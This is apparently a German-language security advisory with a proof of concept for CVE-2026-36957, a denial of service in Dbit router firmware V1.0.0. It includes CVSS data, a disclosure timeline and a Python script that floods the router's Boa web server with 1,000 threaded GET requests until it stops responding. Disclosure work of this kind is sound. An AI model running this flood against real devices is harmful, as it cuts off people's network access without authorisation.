
Proof-of-Concept für CVE-2026-36957, eine Denial-of-Service-Schwachstelle in der Dbit-Router-Firmware über einen HTTP-Flood auf den Boa-Webserver, die Ressourcenerschöpfung und einen Systemabsturz verursacht.
CVE-ID: CVE-2026-36957 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: Shenzhen Dibit Network Equipment Co., Ltd. Produkt: Dbit Router Firmware-Version: V1.0.0 CWE: CWE-400 - Unkontrollierte Ressourcennutzung
Die Firmware V1.0.0 des Dbit Routers ist anfällig für Denial of Service über den URI-Handler des Boa-Webservers. Durch das Senden einer Flut von HTTP-GET-Anfragen an nicht existierende URIs kann ein Angreifer kritische Systemressourcen wie Dateideskriptoren und Speicherpuffer erschöpfen. Dies führt zu einem Kernel-Deadlock oder Systemabsturz, der das Webverwaltungsportal und alle Routing-Funktionen deaktiviert.
CVSS v3.1 Score: 7.5 (Hoch)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metrik | Wert |
|---|
| Angriffsvektor | Netzwerk |
| Angriffskomplexität | Niedrig |
| Erforderliche Privilegien | Keine |
| Benutzerinteraktion | Keine |
| Auswirkung auf Vertraulichkeit | Keine |
| Auswirkung auf Integrität | Keine |
| Auswirkung auf Verfügbarkeit | Hoch |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Erwartetes Verhalten: Der Server sollte Verbindungen begrenzen und stabil bleiben. Tatsächliches Verhalten: Die Webschnittstelle des Routers wird nicht mehr erreichbar; ein manueller Neustart ist erforderlich.
| Datum | Ereignis |
|---|---|
| 2026-04-29 | Schwachstelle entdeckt |
| 2026-04-29 | An MITRE gemeldet |
| 2026-04-29 | CVE-2026-36957 zugewiesen |
| 2026-04-29 | Öffentliche Offenlegung |